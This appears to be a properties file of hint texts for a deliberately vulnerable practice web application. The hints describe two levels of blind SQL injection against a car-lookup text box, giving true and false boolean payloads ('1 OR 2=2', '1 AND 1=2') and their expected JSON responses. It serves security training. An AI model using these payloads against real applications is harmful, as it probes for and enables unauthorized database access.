BLIND_SQL_INJECTION_PAYLOAD_LEVEL_1=It allows a hacker to check if the web application is vulnerable to SQL injection. It does not show any errors. The hacker will try to inject true and false statements.<br/>\
  How to exploit this level?<br/>\
  Import those in textbox<br/>\
  For true statement<br/>\
  1 OR 2=2<br/>\
  Expected result<br/>\
  { "isCarPresent": true }<br/>\
  For false statement<br/>\
  1 AND 1=2<br/>\
  Expected result<br/>\
  { "isCarPresent": false }
BLIND_SQL_INJECTION_PAYLOAD_LEVEL_2=It allows a hacker to check if the web application is vulnerable to SQL injection. It does not show any errors. The hacker will try to inject true and false statements.<br/>\
  How to exploit this level?<br/>\
  Previous queries<br/>\
  1 OR 2=2<br/>\
  1 AND 1=2<br/>\
  return<br/>\
  System Error Occurred. please check logs.<br/>\
  So now we have to import those in textbox<br/>\
  For true statement<br/>\
  1 OR 2=2<br/>\
  Expected result<br/>\
  { "isCarPresent": true }<br/>\
  For false statement<br/>\
  1 AND 1=2<br/>\
  Expected result<br/>\
  { "isCarPresent": false }
